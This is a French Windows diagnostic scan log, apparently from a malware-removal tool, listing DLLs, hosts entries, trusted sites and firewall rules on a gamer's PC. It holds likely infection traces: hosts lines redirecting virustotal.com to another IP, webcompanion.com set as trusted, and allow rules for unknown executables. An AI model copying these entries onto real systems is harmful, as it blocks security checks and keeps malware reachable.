2019-06-01 12:06 - 2019-05-25 09:56 - 054064128 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5WebEngineCore.dll
2019-06-01 12:06 - 2019-05-25 09:56 - 000211456 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5WebEngineWidgets.dll
2019-06-01 12:06 - 2019-05-25 09:56 - 000146432 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5WebSockets.dll
2019-06-01 12:06 - 2019-05-25 09:56 - 005089792 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5Widgets.dll
2019-06-01 12:06 - 2019-05-25 09:56 - 000184832 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5Xml.dll
2017-09-14 08:37 - 2017-09-14 08:37 - 000026112 _____ (The Qt Company Ltd) [Fichier non signé] C:\Users\Luca\AppData\Local\MEGAsync\imageformats\qgif.dll
2017-09-14 08:42 - 2017-09-14 08:42 - 000033280 _____ (The Qt Company Ltd) [Fichier non signé] C:\Users\Luca\AppData\Local\MEGAsync\imageformats\qicns.dll
2017-09-14 08:37 - 2017-09-14 08:37 - 000027648 _____ (The Qt Company Ltd) [Fichier non signé] C:\Users\Luca\AppData\Local\MEGAsync\imageformats\qico.dll
2017-09-14 08:37 - 2017-09-14 08:37 - 000245760 _____ (The Qt Company Ltd) [Fichier non signé] C:\Users\Luca\AppData\Local\MEGAsync\imageformats\qjpeg.dll
2017-09-14 08:42 - 2017-09-14 08:42 - 000021504 _____ (The Qt Company Ltd) [Fichier non signé] C:\Users\Luca\AppData\Local\MEGAsync\imageformats\qsvg.dll
2017-09-14 08:42 - 2017-09-14 08:42 - 000020992 _____ (The Qt Company Ltd) [Fichier non signé] C:\Users\Luca\AppData\Local\MEGAsync\imageformats\qtga.dll
2017-09-14 08:42 - 2017-09-14 08:42 - 000316416 _____ (The Qt Company Ltd) [Fichier non signé] C:\Users\Luca\AppData\Local\MEGAsync\imageformats\qtiff.dll
2017-09-14 08:42 - 2017-09-14 08:42 - 000019968 _____ (The Qt Company Ltd) [Fichier non signé] C:\Users\Luca\AppData\Local\MEGAsync\imageformats\qwbmp.dll
2017-09-14 08:42 - 2017-09-14 08:42 - 000322560 _____ (The Qt Company Ltd) [Fichier non signé] C:\Users\Luca\AppData\Local\MEGAsync\imageformats\qwebp.dll
2017-09-14 08:37 - 2017-09-14 08:37 - 001010688 _____ (The Qt Company Ltd) [Fichier non signé] C:\Users\Luca\AppData\Local\MEGAsync\platforms\qwindows.dll
2019-05-25 20:52 - 2019-05-25 20:52 - 000047104 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\audio\qtaudio_windows.dll
2019-05-25 20:52 - 2019-05-25 20:52 - 000026112 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\imageformats\qgif.dll
2019-05-25 20:52 - 2019-05-25 20:52 - 000027136 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\imageformats\qico.dll
2019-05-25 20:52 - 2019-05-25 20:52 - 000243712 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\imageformats\qjpeg.dll
2019-05-25 20:52 - 2019-05-25 20:52 - 000223744 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\imageformats\qmng.dll
2019-05-25 20:52 - 2019-05-25 20:52 - 000020992 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\imageformats\qsvg.dll
2019-05-25 20:52 - 2019-05-25 20:52 - 000332288 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\imageformats\qtiff.dll
2019-05-25 20:52 - 2019-05-25 20:52 - 001140224 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\platforms\qwindows.dll
2019-05-25 20:52 - 2019-05-25 20:52 - 000041984 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\qml\QtGraphicalEffects\private\qtgraphicaleffectsprivate.dll
2019-05-25 20:52 - 2019-05-25 20:52 - 000014848 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\qml\QtGraphicalEffects\qtgraphicaleffectsplugin.dll
2019-05-25 20:52 - 2019-05-25 20:52 - 000014848 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\qml\QtQml\Models.2\modelsplugin.dll
2019-05-25 20:52 - 2019-05-25 20:52 - 000014848 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\qml\QtQuick.2\qtquick2plugin.dll
2019-05-25 20:52 - 2019-05-25 20:52 - 000084480 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\qml\QtQuick\Controls.2\qtquickcontrols2plugin.dll
2019-05-25 20:52 - 2019-05-25 20:52 - 000267776 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\qml\QtQuick\Controls\qtquickcontrolsplugin.dll
2019-05-25 20:52 - 2019-05-25 20:52 - 000071680 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\qml\QtQuick\Layouts\qquicklayoutsplugin.dll
2019-05-25 20:52 - 2019-05-25 20:52 - 000211456 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\qml\QtQuick\Templates.2\qtquicktemplates2plugin.dll
2019-05-25 20:52 - 2019-05-25 20:53 - 000014848 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\qml\QtQuick\Window.2\windowplugin.dll
2019-05-25 20:53 - 2019-05-25 20:53 - 004943360 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\Qt5Core.dll
2019-05-25 20:53 - 2019-05-25 20:53 - 005022208 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\Qt5Gui.dll
2019-05-25 20:53 - 2019-05-25 20:53 - 000626176 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\Qt5Multimedia.dll
2019-05-25 20:53 - 2019-05-25 20:53 - 000877056 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\Qt5Network.dll
2019-05-25 20:53 - 2019-05-25 20:53 - 002908672 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\Qt5Qml.dll
2019-05-25 20:53 - 2019-05-25 20:53 - 003078656 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\Qt5Quick.dll
2019-05-25 20:53 - 2019-05-25 20:53 - 000096256 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\Qt5QuickControls2.dll
2019-05-25 20:53 - 2019-05-25 20:53 - 000681472 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\Qt5QuickTemplates2.dll
2019-05-25 20:53 - 2019-05-25 20:53 - 000259072 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\Qt5Svg.dll
2019-05-25 20:53 - 2019-05-25 20:53 - 004718080 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\Qt5Widgets.dll
2019-05-25 20:53 - 2019-05-25 20:53 - 000439296 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\Qt5WinExtras.dll
2019-05-25 20:53 - 2019-05-25 20:53 - 000159232 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\Qt5Xml.dll

==================== Alternate Data Streams (Avec liste blanche) =========

(Si un élément est inclus dans le fichier fixlist.txt, seul le flux de données additionnel (ADS - Alternate Data Stream) sera supprimé.)

AlternateDataStreams: C:\Users\Luca:.repos [6040176]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [480]

==================== Mode sans échec (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le "AlternateShell" sera restauré.)

==================== Association (Avec liste blanche) ===============

(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé.)

==================== Internet Explorer sites de confiance/sensibles ===============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre.)

IE trusted site: HKU\.DEFAULT\...\localhost -> localhost
IE trusted site: HKU\.DEFAULT\...\webcompanion.com -> hxxp://webcompanion.com
IE trusted site: HKU\S-1-5-21-3183337316-3821782573-710669081-1001\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-3183337316-3821782573-710669081-1001\...\webcompanion.com -> hxxp://webcompanion.com

==================== Hosts contenu: ==========================

(Si nécessaire, la commande Hosts: peut être incluse dans le fichier fixlist.txt afin de réinitialiser le fichier hosts.)

2018-09-15 09:31 - 2019-06-04 02:01 - 000000458 _____ C:\Windows\system32\drivers\etc\hosts

162.222.193.86 aoaomo.tremorhub.com
188.95.50.62 bobomo.tremorhub.com
162.222.193.86 www.howcast.com
162.222.193.86 howcast.com
162.222.193.86 www.ustream.tv
162.222.193.86 ustream.tv
162.222.193.86 www.livestream.com
162.222.193.86 livestream.com
162.222.193.86 www.dailymotion.com
162.222.193.86 dailymotion.com
192.192.3.8 www.virustotal.com
192.192.3.8 virustotal.com

2018-12-27 01:43 - 2018-12-27 01:44 - 000000375 _____ C:\Windows\system32\drivers\etc\hosts.ics

==================== Autres zones ============================

(Actuellement, il n'y a pas de correction automatique pour cette section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-21-3183337316-3821782573-710669081-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Luca\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppBackground\d7df5243cea0abf8e4484b160a0bf5ad.png
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
Le Pare-feu est activé.

==================== MSCONFIG/TASK MANAGER éléments désactivés ==

Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.

==================== RèglesPare-feu (Avec liste blanche) ===============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

FirewallRules: [{C4CEA4D4-E70C-40C3-8B77-44C479EC0228}] => (Allow) C:\Program Files\DriversCloud.com\DriversCloud.exe Pas de fichier
FirewallRules: [{C67B3A3E-974E-43B0-913B-CEDA61111E3F}] => (Allow) C:\Program Files\DriversCloud.com\DriversCloud.exe Pas de fichier
FirewallRules: [TCP Query User{E7A56644-F9BE-4B00-9FFA-C8AA1350138E}D:\jeux\gog games\star wars - battlefront 2\gamedata\battlefrontii.exe] => (Allow) D:\jeux\gog games\star wars - battlefront 2\gamedata\battlefrontii.exe Pas de fichier
FirewallRules: [UDP Query User{5C2D6D4E-6A25-492B-B4D9-C0E988B87596}D:\jeux\gog games\star wars - battlefront 2\gamedata\battlefrontii.exe] => (Allow) D:\jeux\gog games\star wars - battlefront 2\gamedata\battlefrontii.exe Pas de fichier
FirewallRules: [{35AA7FF1-6EC8-4B9B-862B-252C003854BE}] => (Allow) E:\Programmes\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{6D5EE91C-225B-41BF-8322-4547FAFF75B4}] => (Allow) E:\Programmes\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{EFD538F9-120B-49FF-8E48-B29B8D951348}] => (Allow) E:\Programmes\Steam\bin\cef\cef.win7\steamwebhelper.exe Pas de fichier
FirewallRules: [{E75B2E82-02AE-49EE-A9A5-784F637EF68F}] => (Allow) E:\Programmes\Steam\bin\cef\cef.win7\steamwebhelper.exe Pas de fichier
FirewallRules: [{67031B8B-8761-4A56-A50C-4BECFAB6B261}] => (Allow) E:\Programmes\Steam\steamapps\common\ShadowOfMordor\x64\ShadowOfMordor.exe Pas de fichier
FirewallRules: [{0DAC699D-9F95-4B1F-A760-D969DB55FE23}] => (Allow) E:\Programmes\Steam\steamapps\common\ShadowOfMordor\x64\ShadowOfMordor.exe Pas de fichier
FirewallRules: [TCP Query User{6D787ACA-9FAE-4E26-8C3A-2B4F1F1FBAEE}E:\programmes\minecraft\runtime\jre-x64\1.8.0_51\bin\javaw.exe] => (Allow) E:\programmes\minecraft\runtime\jre-x64\1.8.0_51\bin\javaw.exe Pas de fichier
FirewallRules: [UDP Query User{681339B6-4D2F-4BA6-A2CE-6BBFF63A2A4C}E:\programmes\minecraft\runtime\jre-x64\1.8.0_51\bin\javaw.exe] => (Allow) E:\programmes\minecraft\runtime\jre-x64\1.8.0_51\bin\javaw.exe Pas de fichier
FirewallRules: [TCP Query User{7F8014BB-0A4E-4FE2-87EF-E6C0126305EB}C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [UDP Query User{C65F0971-39F5-4CDA-BB6E-574B570A328A}C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [TCP Query User{8F6822C5-6291-48B8-91C3-95B88BB99EB3}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [UDP Query User{A688A63B-A5DB-4CE9-AF24-791ABF016E11}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [TCP Query User{86A23B8D-418C-4B18-887A-34D190D5A858}C:\program files\epic games\subnautica\subnautica.exe] => (Allow) C:\program files\epic games\subnautica\subnautica.exe Pas de fichier
FirewallRules: [UDP Query User{1EB99348-BBE4-4FB6-BE07-0918B69CF291}C:\program files\epic games\subnautica\subnautica.exe] => (Allow) C:\program files\epic games\subnautica\subnautica.exe Pas de fichier
FirewallRules: [TCP Query User{5B672003-343F-435E-98BE-48DED4158035}C:\program files (x86)\call of duty black ops 4\blackops4.exe] => (Allow) C:\program files (x86)\call of duty black ops 4\blackops4.exe Pas de fichier
FirewallRules: [UDP Query User{B477D79A-DBFE-4B9A-8C99-050360155387}C:\program files (x86)\call of duty black ops 4\blackops4.exe] => (Allow) C:\program files (x86)\call of duty black ops 4\blackops4.exe Pas de fichier
FirewallRules: [TCP Query User{12667AE2-6AF7-40F5-A88F-176AA391EACD}C:\program files\epic games\subnautica\subnautica.exe] => (Allow) C:\program files\epic games\subnautica\subnautica.exe Pas de fichier
FirewallRules: [UDP Query User{575511C8-FD2E-4AA2-B868-855D5476BFF2}C:\program files\epic games\subnautica\subnautica.exe] => (Allow) C:\program files\epic games\subnautica\subnautica.exe Pas de fichier
FirewallRules: [TCP Query User{56A278BB-9126-4E6F-8D78-EC058244BE89}E:\programmes\minecraft\runtime\jre-x64\1.8.0_51\bin\javaw.exe] => (Allow) E:\programmes\minecraft\runtime\jre-x64\1.8.0_51\bin\javaw.exe Pas de fichier
FirewallRules: [UDP Query User{FFA7B4FC-9B76-4827-A22C-B31D0F55F750}E:\programmes\minecraft\runtime\jre-x64\1.8.0_51\bin\javaw.exe] => (Allow) E:\programmes\minecraft\runtime\jre-x64\1.8.0_51\bin\javaw.exe Pas de fichier
FirewallRules: [{DBB6B518-C598-48BD-B6C8-8E1FA3EFCEDA}] => (Allow) E:\Programmes\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{B81FD013-E746-4667-8D1B-973BCDB67C1C}] => (Allow) E:\Programmes\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [TCP Query User{DC19BA6F-F7E6-4EFA-AE37-8A5E09050C6B}C:\program files (x86)\call of duty black ops 4\blackops4.exe] => (Allow) C:\program files (x86)\call of duty black ops 4\blackops4.exe Pas de fichier
FirewallRules: [UDP Query User{1B71BB45-B1AC-4FE0-B2AA-A026D108CC9E}C:\program files (x86)\call of duty black ops 4\blackops4.exe] => (Allow) C:\program files (x86)\call of duty black ops 4\blackops4.exe Pas de fichier
FirewallRules: [TCP Query User{55629635-C996-4972-B538-E8D189F7808B}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [UDP Query User{86C09AC4-F7D5-4B23-A399-BF469BD48669}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [TCP Query User{FB1AB133-B875-4077-B2B3-8FF49B5AD0AE}C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Block) C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [UDP Query User{4FFA4234-5518-4633-862C-F28EEF9337B8}C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Block) C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [TCP Query User{C27C0DB4-FC1B-4E0B-880D-C4988CEAC03B}C:\program files (x86)\origin games\apex\r5apex.exe] => (Allow) C:\program files (x86)\origin games\apex\r5apex.exe (NVIDIA GameStream Server -> Respawn Entertainment) [Fichier non signé]
FirewallRules: [UDP Query User{8BF721A4-84F4-4E61-8FA0-7B807877B07A}C:\program files (x86)\origin games\apex\r5apex.exe] => (Allow) C:\program files (x86)\origin games\apex\r5apex.exe (NVIDIA GameStream Server -> Respawn Entertainment) [Fichier non signé]
FirewallRules: [TCP Query User{22476E33-6B7A-4419-92A8-68ACAF31CF23}C:\program files (x86)\origin games\apex\r5apex.exe] => (Allow) C:\program files (x86)\origin games\apex\r5apex.exe (NVIDIA GameStream Server -> Respawn Entertainment) [Fichier non signé]
FirewallRules: [UDP Query User{DF877D81-21B9-4CB1-8905-7002C430D745}C:\program files (x86)\origin games\apex\r5apex.exe] => (Allow) C:\program files (x86)\origin games\apex\r5apex.exe (NVIDIA GameStream Server -> Respawn Entertainment) [Fichier non signé]
FirewallRules: [{BCB089B5-4E0E-41D0-8D5F-87D0F394F941}] => (Allow) C:\Program Files (x86)\theHunter\launcher\launcher.exe Pas de fichier
FirewallRules: [{1ADC4F7C-FA1F-48CB-BE41-D5FB30F21B4C}] => (Allow) C:\Program Files (x86)\theHunter\launcher\launcher.exe Pas de fichier
FirewallRules: [TCP Query User{90D38539-2AC8-4316-B73F-039C62A392A0}C:\program files (x86)\thehunter\game\thehunter.exe] => (Allow) C:\program files (x86)\thehunter\game\thehunter.exe Pas de fichier
FirewallRules: [UDP Query User{00F416D7-78F6-42DF-A59E-86A5E143133E}C:\program files (x86)\thehunter\game\thehunter.exe] => (Allow) C:\program files (x86)\thehunter\game\thehunter.exe Pas de fichier
FirewallRules: [TCP Query User{020860F0-2485-43A8-9ED6-7AAC611A4029}C:\program files (x86)\overwatch\overwatch.exe] => (Allow) C:\program files (x86)\overwatch\overwatch.exe Pas de fichier
FirewallRules: [UDP Query User{73B648D0-CD17-40F9-AAE6-6CF0DBBDD2BF}C:\program files (x86)\overwatch\overwatch.exe] => (Allow) C:\program files (x86)\overwatch\overwatch.exe Pas de fichier
FirewallRules: [TCP Query User{3617A8B4-3209-4C9F-8AA3-BA7CA6AC2973}C:\program files (x86)\overwatch\overwatch.exe] => (Allow) C:\program files (x86)\overwatch\overwatch.exe Pas de fichier
FirewallRules: [UDP Query User{65323F0D-A247-42D9-A1B0-E79B162F05A9}C:\program files (x86)\overwatch\overwatch.exe] => (Allow) C:\program files (x86)\overwatch\overwatch.exe Pas de fichier
FirewallRules: [{CBB53F6B-3F4F-43A1-8B14-41ABC000128C}] => (Allow) E:\Programmes\Steam\steamapps\common\Rust\Rust.exe (Facepunch Studios Ltd -> EasyAntiCheat Ltd)
FirewallRules: [{34D5DCF2-BB16-4DF6-8EFE-31D3E19D2D9F}] => (Allow) E:\Programmes\Steam\steamapps\common\Rust\Rust.exe (Facepunch Studios Ltd -> EasyAntiCheat Ltd)
FirewallRules: [{CE6BC38F-CA22-413D-AEC6-C89D8F6FAE7D}] => (Allow) E:\Programmes\Ubisoft Game Launcher\games\Far Cry New Dawn\bin\FarCryNewDawn.exe (UBISOFT ENTERTAINMENT INC. -> Ubisoft Entertainment)
FirewallRules: [{E550E28E-B208-466F-BD78-AD1CCABFCD77}] => (Allow) E:\Programmes\Ubisoft Game Launcher\games\Far Cry New Dawn\bin\FarCryNewDawn.exe (UBISOFT ENTERTAINMENT INC. -> Ubisoft Entertainment)
FirewallRules: [TCP Query User{B9C0DFCC-BFA0-4050-9531-5F46240D6E34}C:\program files (x86)\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [UDP Query User{69712AE2-51A0-44C4-B89C-1646B53437FC}C:\program files (x86)\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [{CF8F908A-B65A-47FB-9B99-0A866398A15D}] => (Allow) C:\Program Files (x86)\Origin Games\Apex\EasyAntiCheat_launcher.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
FirewallRules: [{4C7B65AA-4F13-4E17-8713-3FCC22A35940}] => (Allow) C:\Program Files (x86)\Origin Games\Apex\EasyAntiCheat_launcher.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
FirewallRules: [TCP Query User{66F740C6-28A6-4058-BE32-59FCADD943E5}E:\programmes\minecraft\runtime\jre-x64\bin\javaw.exe] => (Allow) E:\programmes\minecraft\runtime\jre-x64\bin\javaw.exe
FirewallRules: [UDP Query User{898A3415-E169-4826-8DF2-066E1BC5D6C3}E:\programmes\minecraft\runtime\jre-x64\bin\javaw.exe] => (Allow) E:\programmes\minecraft\runtime\jre-x64\bin\javaw.exe
FirewallRules: [TCP Query User{4CF55510-DEA4-4585-AD0E-93E9DD252581}C:\program files\java\jre1.8.0_211\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_211\bin\javaw.exe
FirewallRules: [UDP Query User{37B9B4FF-34FA-4530-82BF-FE0A07C50B2F}C:\program files\java\jre1.8.0_211\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_211\bin\javaw.exe
FirewallRules: [TCP Query User{B87284A4-69A5-4F69-BC01-ACD7F65E17C0}E:\programmes\minecraft\runtime\jre-x64\bin\javaw.exe] => (Allow) E:\programmes\minecraft\runtime\jre-x64\bin\javaw.exe
FirewallRules: [UDP Query User{31858F16-4FC0-4EA1-A957-58CEFB33B211}E:\programmes\minecraft\runtime\jre-x64\bin\javaw.exe] => (Allow) E:\programmes\minecraft\runtime\jre-x64\bin\javaw.exe
FirewallRules: [TCP Query User{97135BF8-D015-43C2-8FFD-C45775919654}C:\program files (x86)\common files\oracle\java\javapath_target_94430703\java.exe] => (Allow) C:\program files (x86)\common files\oracle\java\javapath_target_94430703\java.exe
FirewallRules: [UDP Query User{2471A425-C42B-4D30-8859-C6BA07333646}C:\program files (x86)\common files\oracle\java\javapath_target_94430703\java.exe] => (Allow) C:\program files (x86)\common files\oracle\java\javapath_target_94430703\java.exe
FirewallRules: [{22CF977F-189A-4737-9BD7-EA5B1197A030}] => (Allow) LPort=25565
FirewallRules: [TCP Query User{1A9862BD-029E-491D-89C7-0A50B42E95DB}C:\program files (x86)\common files\oracle\java\javapath_target_94430703\java.exe] => (Allow) C:\program files (x86)\common files\oracle\java\javapath_target_94430703\java.exe
FirewallRules: [UDP Query User{3579A541-D31A-4F67-B593-0FEA5E359D40}C:\program files (x86)\common files\oracle\java\javapath_target_94430703\java.exe] => (Allow) C:\program files (x86)\common files\oracle\java\javapath_target_94430703\java.exe
FirewallRules: [{3DA9B534-2530-4983-8217-CC5196CC7AA6}] => (Allow) E:\Programmes\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe (Valve -> )
FirewallRules: [{C15E1FA4-3978-41C5-9DAE-3DF9C9839F28}] => (Allow) E:\Programmes\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe (Valve -> )
FirewallRules: [{450F456A-E430-49B9-B908-7C1C97C28236}] => (Allow) C:\Windows\system32\rundll32.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{2EC9F487-1DCC-490C-A487-F20E81496931}] => (Allow) C:\Program Files (x86)\Primary\Velde.exe Pas de fichier
FirewallRules: [{F0683852-B532-49BA-9EF3-AB7D501B755C}] => (Allow) C:\Program Files (x86)\Otherwise\Sixth.exe Pas de fichier
FirewallRules: [{F13038C6-837D-4D32-B087-2FC59EB9A3E7}] => (Allow) C:\Windows\SysWOW64\TCPSVCS.EXE (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{A894EA88-5A13-4BC4-86DE-3D7DD87FE105}] => (Allow) C:\Windows\system32\rundll32.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [TCP Query User{BB989E8A-243D-4344-8630-3BD9DE15F90E}C:\windows\syswow64\svchost.exe] => (Allow) C:\windows\syswow64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [UDP Query User{76EE825A-9037-4EDB-948A-4E8D65A59030}C:\windows\syswow64\svchost.exe] => (Allow) C:\windows\syswow64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{1B45E94C-9189-4E07-B82C-B3C152A112D6}] => (Allow) C:\Windows\System32\rundll32.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{49089F59-0077-4D4E-B8CE-E1E848ABAA3E}] => (Allow) C:\Windows\System32\rundll32.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{A3057545-81EC-4A53-B8DD-A1856FF90A50}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google Inc.)
FirewallRules: [{E0EF78D4-FD5E-446C-AD43-7D762D537C68}] => (Allow) C:\Program Files (x86)\Origin Games\Apex\EasyAntiCheat_launcher.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
FirewallRules: [{A57B14B8-BFC1-411E-803D-B5F3513CDFCB}] => (Allow) C:\Program Files (x86)\Origin Games\Apex\EasyAntiCheat_launcher.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
FirewallRules: [{16677F5E-12B7-413B-B742-9A695E7602AA}] => (Allow) E:\Programmes\Steam\steamapps\common\rocketleague\Binaries\Win32\RocketLeague.exe (Psyonix, Inc) [Fichier non signé]
FirewallRules: [{7788B0C5-1E7D-49BE-ACC1-370D1213859C}] => (Allow) E:\Programmes\Steam\steamapps\common\rocketleague\Binaries\Win32\RocketLeague.exe (Psyonix, Inc) [Fichier non signé]

==================== Points de restauration =========================

02-06-2019 16:26:01 DirectX est installé
04-06-2019 02:24:43 Removed DriversCloud.com (64 bits)
05-06-2019 13:23:21 DirectX est installé

==================== Éléments en erreur du Gestionnaire de périphériques =============

==================== Erreurs du Journal des événements: =========================

Erreurs Application:
==================
Error: (06/04/2019 07:33:48 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Le programme ShellExperienceHost.exe version 10.0.17763.439 a cessé d'interagir avec Windows et a été fermé. Pour voir si plus d'informations sur le problème sont disponibles, vérifiez l'historique des problèmes dans le Panneau de configuration Sécurité et maintenance.

ID de processus : df8

Heure de début : 01d51af3da608f31

Heure d'arrêt : 4294967295

Chemin d'accès à l'application : C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe

